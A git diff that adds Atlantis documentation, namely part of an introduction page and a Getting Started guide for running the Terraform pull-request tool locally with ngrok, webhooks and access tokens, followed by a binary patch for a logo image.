+If you'd like to try out running Atlantis on an example repo check out the [Test Drive](test-drive.html).
+
+## Why would you run Atlantis?
+### Increased visibility
+When everyone is executing Terraform on their own computers, it's hard to know the
+
+current state of your infrastructure:
+* Is what's in `master` deployed?
+* Did someone forget to create a pull request for that latest change?
+* What was the output from that last `terraform apply`?
+
+With Atlantis, everything is visible on the pull request. You can view the history
+of everything that was done to your infrastructure.
+
+### Enable collaboration with everyone
+You probably don't want to distribute Terraform credentials to everyone in your
+engineering organization, but now anyone can open up a Terraform pull request.
+
+You can require approval before the pull request is applied so nothing happens
+accidentally.
+
+### Review Terraform pull requests better
+You can't fully review a Terraform change without seeing the output of `terraform plan`.
+Now that output is added to the pull request automatically.
+
+### Standardize your workflows
+Atlantis locks a directory/workspace until the pull request is merged or the lock
+is manually deleted. This ensures that changes are applied in the order expected.
+
+The exact commands that Atlantis runs are configurable. You can run custom scripts
+to construct your ideal workflow.
+
+## Next Steps
+* If you'd like to try out Atlantis on a test repo, check out the [Test Drive](test-drive.html).
+* If you're ready to deploy it on your own repos, check out [Getting Started](getting-started.html).
+* If you're wondering if Atlantis supports how you run Terraform, read [Requirements](requirements.html).
\ No newline at end of file
diff --git a/runatlantis.io/guide/getting-started.md b/runatlantis.io/guide/getting-started.md
new file mode 100644
index 0000000000..1085a63dd8
--- /dev/null
+++ b/runatlantis.io/guide/getting-started.md
@@ -0,0 +1,171 @@
+# Getting Started
+These instructions are for running Atlantis locally so you can test it out against
+your own repositories before deciding whether to install it more permanently.
+
+::: tip
+If you want to set up a production-ready Atlantis installation, read [Deployment](../docs/deployment.html).
+:::
+
+Steps:
+
+[[toc]]
+
+## Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from [https://www.terraform.io/downloads.html](https://www.terraform.io/downloads.html)
+```
+unzip path/to/terraform_*.zip -d /usr/local/bin
+```
+
+## Download Atlantis
+Get the latest release from [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+and unpackage it.
+
+## Download Ngrok
+Atlantis needs to be accessible somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach.
+One way to accomplish this is with ngrok, a tool that forwards your local port to a random
+public hostname.
+
+TODO: ngrok download instructions
+
+Start `ngrok` on port `4141`:
+```
+ngrok http 4141
+```
+
+In a new tab (where you'll soon start Atlantis) create an environment variable with
+the URL ngrok output:
+```
+URL=https://{YOUR_HOSTNAME}.ngrok.io
+```
+
+## Create a Webhook Secret
+GitHub and GitLab use webhook secrets so clients can verify that the webhooks came
+from them. Create a random string of any length (you can use [https://www.random.org/strings/](https://www.random.org/strings/))
+and set an environment variable:
+```
+SECRET={YOUR_RANDOM_STRING}
+```
+
+## Add Webhook
+Take the URL that ngrok output and create a webhook in your GitHub or GitLab repo:
+
+### GitHub
+- Go to your repo's settings
+- Select **Webhooks** or **Hooks** in the sidebar
+- Click **Add webhook**
+- set **Payload URL** to your ngrok url with `/events` at the end. Ex. `https://c5004d84.ngrok.io/events`
+- double-check you added `/events` to the end of your URL.
+- set **Content type** to `application/json`
+- set **Secret** to your random string
+- select **Let me select individual events**
+- check the boxes
+	- **Pull request reviews**
+	- **Pushes**
+	- **Issue comments**
+	- **Pull requests**
+- leave **Active** checked
+- click **Add webhook**
+
+### GitLab
+- Go to your repo's home page
+- Click **Settings > Integrations** in the sidebar
+- set **URL** to your ngrok url with `/events` at the end. Ex. `https://c5004d84.ngrok.io/events`
+- double-check you added `/events` to the end of your URL.
+- set **Secret Token** to your random string
+- check the boxes
+    - **Push events**
+    - **Comments**
+    - **Merge Request events**
+- leave **Enable SSL verification** checked
+- click **Add webhook**
+
+## Create an access token for Atlantis
+We recommend using a dedicated CI user or creating a new user named **@atlantis** that performs all API actions, however for testing,
+you can use your own user. Here we'll create the access token that Atlantis uses to comment on the pull request and
+set commit statuses.
+
+### GitHub
+- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
+- create a token with **repo** scope
+- set the token as an environment variable
+```
+TOKEN={YOUR_TOKEN}
+```
+
+### GitLab
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
+- create a token with **api** scope
+- set the token as an environment variable
+```
+TOKEN={YOUR_TOKEN}
+```
+
+## Start Atlantis
+You're almost ready to start Atlantis, just set one more variable:
+
+```
+USERNAME={the username of your GitHub or GitLab user}
+```
+Now you can start Atlantis, the exact command differs depending on your Git Host:
+
+### GitHub
+```
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+```
+
+### GitHub Enterprise
+```
+HOSTNAME=YOUR_GITHUB_ENTERPRISE_HOSTNAME # ex. github.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $HOSTNAME
+```
+
+### GitLab
+```
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+```
+
+### GitLab Enterprise
+```
+HOSTNAME=YOUR_GITLAB_ENTERPRISE_HOSTNAME # ex. gitlab.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET --gitlab-hostname $HOSTNAME
+```
+
+## Create a pull request
+Create a pull request so you can test Atlantis.
+::: tip
+You could add a null resource as a test:
+```hcl
+resource "null_resource" "example" {}
+```
+Or just modify the whitespace in a file.
+:::
+
+### Autoplan
+You should see Atlantis logging about receiving the webhook and you should see the output of `terraform plan` on your repo.
+
+Atlantis tries to figure out the directory to plan in based on the files modified.
+If you need to customize the directories that that Atlantis runs in or the commands it runs if you're using workspaces
+or `.tfvars` files, see [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+
+### Manual Plan
+To manually `plan` in a specific directory or workspace, comment on the pull request using the `-d` or `-w` flags:
+```
+atlantis plan -d mydir
+atlantis plan -w staging
+```
+
+To add additional arguments to the underlying `terraform plan` you can use:
+```
+atlantis plan -- -target=resource -var 'foo=bar'
+```
+
+### Apply
+If you'd like to `apply`, type a comment: `atlantis apply`. You can use the `-d` or `-w` flags to point
+Atlantis at a specific plan. Otherwise it tries to apply the plan for the root directory.
+
+## Next Steps
+* You're done! Hopefully Atlantis is working with your repo and you're ready to move on to a [production-ready deployment](../docs/deployment.html).
+* If it's not working as expected, you may need to customize how Atlantis runs with an `atlantis.yaml` file.
+See [atlantis.yaml Reference](../docs/atlantis-yaml-reference.html).
+* Check out our full documentation for more details: [Documentation](../docs/).
diff --git a/runatlantis.io/guide/images/atlantis-logo.png b/runatlantis.io/guide/images/atlantis-logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..748e26771af638c3dea9a2c31626213b7e43bf38
GIT binary patch
literal 14750
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
